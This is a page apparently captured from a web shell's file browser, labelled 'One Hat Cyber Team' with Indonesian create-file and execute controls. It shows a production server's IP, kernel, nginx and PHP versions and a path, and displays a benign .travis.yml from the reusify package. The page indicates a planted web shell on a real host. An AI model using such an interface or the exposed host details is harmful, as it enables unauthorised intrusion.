One Hat Cyber Team
Your IP :
18.227.102.236
Server IP :
104.21.16.1
Server :
Linux agrigation-prod 5.15.0-67-generic #74-Ubuntu SMP Wed Feb 22 14:14:39 UTC 2023 x86_64
Server Software :
nginx/1.24.0
PHP Version :
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
forge
/
app.gftag.com
/
node_modules
/
reusify
/
View File Name :
.travis.yml
language: node_js sudo: false node_js: - 9 - 8 - 7 - 6 - 5 - 4 - 4.0 - iojs-v3 - iojs-v2 - iojs-v1 - 0.12 - 0.10 cache: directories: - node_modules after_script: - npm run coverage notifications: email: on_success: never on_failure: always